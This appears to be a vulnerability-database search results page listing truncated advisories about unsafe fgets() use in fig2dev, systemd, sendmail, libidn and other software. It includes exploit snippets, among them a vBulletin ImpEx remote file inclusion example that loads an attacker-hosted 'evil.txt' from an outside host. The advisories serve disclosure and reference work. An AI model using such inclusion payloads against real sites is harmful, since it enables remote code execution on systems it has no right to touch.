CVE-2020-21533

In transfig's fig2dev 3.2.7b it is possible for an attacker to create a specially crafted file that causes a buffer overflow due to the usage of fgets. This leads to a denial of service, impacting availability of the program...

CVE-2020-21530

In transfig's fig2dev 3.2.7b it is possible for an attacker to create a specially crafted file that causes a buffer overflow due to usage of fgets. This leads to a denial of service via segmentation fault, impacting availability of the program...

systemd: reexec state injection: fgets() on overlong lines leads to line splitting

...

systemd: line splitting via fgets() allows for state injection during daemon-reexec

It was discovered that systemd is vulnerable to a state injection attack when deserializing the state of a service. Properties longer than LINEMAX are not correctly parsed and an attacker may abuse this flaw in particularly configured services to inject, change, or corrupt the service state...

Privilege Escalation

libsystemd.so is vulnerable to privilege escalation. When NotifyAccess != none, the line read by fgets in the unitdeserialize function allows line splitting during daemon-reexec when long lines are submitted which can result in state injection. An attacker is able to exploit this vulnerability to...

systemd - reexec State Injection

systemd - reexec State Injection / I am sending this bug report to Ubuntu, even though it's an upstream bug, as requested at https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.mdsecurity-vulnerability-reports . When systemd re-executes e.g. during a package upgrade, state is...

systemd - 'reexec' State Injection

/ I am sending this bug report to Ubuntu, even though it's an upstream bug, as requested at https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.mdsecurity-vulnerability-reports . When systemd re-executes e.g. during a package upgrade, state is serialized into a memfd before the execv...

Linux systemd Line Splitting

systemd: reexec state injection: fgets on overlong lines leads to line splitting CVE-2018-15686 I am sending this bug report to Ubuntu, even though it's an upstream bug, as requested at https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.mdsecurity-vulnerability-reports . When system...

Linux systemd Line Splitting Exploit

Linux has an issue with systemd where overlong input to fgets during reexec state injection can lead to line splitting. systemd: reexec state injection: fgets on overlong lines leads to line splitting CVE-2018-15686 I am sending this bug report to Ubuntu, even though it's an upstream bug, as...

Internet Bug Bounty: integer overflow in fgets cause heap corruption

Please check: https://bugs.php.net/bug.php?id=73011...

libidn: denial of service

CVE-2015-8948 denial of service Solve out-of-bounds-read when reading one zero byte as input. Also replaced fgets with getline. Reported by Hanno Boeck. - CVE-2016-6261 denial of service Fix out-of-bounds stack read in idnatoascii4i. Reported by Hanno Boeck. - CVE-2016-6262 denial of service...

Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun

No description provided by source. source: http://www.securityfocus.com/bid/8028/info A buffer overrun has been discovered in Tripbit Secure Code Analizer when reading data from source files. The problem occurs due to an insecure use of the fgets function. This vulnerability could be triggered by...

Mozilla Codesighs Memory Corruption

!/usr/bin/perl thedailyshow.pl AKA Mozilla Codesighs Memory Corruption PoC Jeremy Brown [email protected]//jbrownsec.blogspot.com//krakowlabs.com 12.12.2009 257 while0 == retval && NULL != fgetslineBuffer, sizeoflineBuffer, inOptions-mInput gdb 259 trimWhitelineBuffer; gdb trimWhite...

Mozilla Codesighs - Memory Corruption

!/usr/bin/perl thedailyshow.pl AKA Mozilla Codesighs Memory Corruption PoC Jeremy Brown [email protected]//jbrownsec.blogspot.com//krakowlabs.com 12.12.2009 257 while0 == retval && NULL != fgetslineBuffer, sizeoflineBuffer, inOptions-mInput gdb 259 trimWhitelineBuffer; gdb trimWhite...

Multiple FTP servers unsafe fgets() vulnerability

It's possible to embed additional commands into URLs...

vBulletin ImpEx <= 1.74 Remote Command Execution Exploit

No description provided by source. ?php / vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, My gf url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/impex/ImpExData.php?systempath= hurl:http://www.pwn3d.com/evil.txt? / $cm...

Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun

// source: https://www.securityfocus.com/bid/8028/info A buffer overrun has been discovered in Tripbit Secure Code Analizer when reading data from source files. The problem occurs due to an insecure use of the fgets function. This vulnerability could be triggered by a malicious source file...

Tripbit Secure Code Analizer 1.0 - fgets() Local Buffer Overrun

Tripbit Secure Code Analizer 1.0 - fgets Local Buffer Overrun // source: https://www.securityfocus.com/bid/8028/info A buffer overrun has been discovered in Tripbit Secure Code Analizer when reading data from source files. The problem occurs due to an insecure use of the fgets function. This...

Re: unsafe fgets() in sendmail's mail.local

On Mon, Apr 24, 2000, 3APA3A wrote: Topic: unsafe fgets in sendmail's mail.local 1. Possibility to insert LMTP commands into e-mail message 2. Possibility of deadlock between sendmail and mail.local 3. Possibility to corrupt user's mailbox 4. Possibility to change e-mail headers of the message in...

unsafe fgets() in sendmail's mail.local

Topic: unsafe fgets in sendmail's mail.local Description: There are 4 problems: 1. Possibility to insert LMTP commands into e-mail message 2. Possibility of deadlock between sendmail and mail.local 3. Possibility to corrupt user's mailbox 4. Possibility to change e-mail headers of the message in...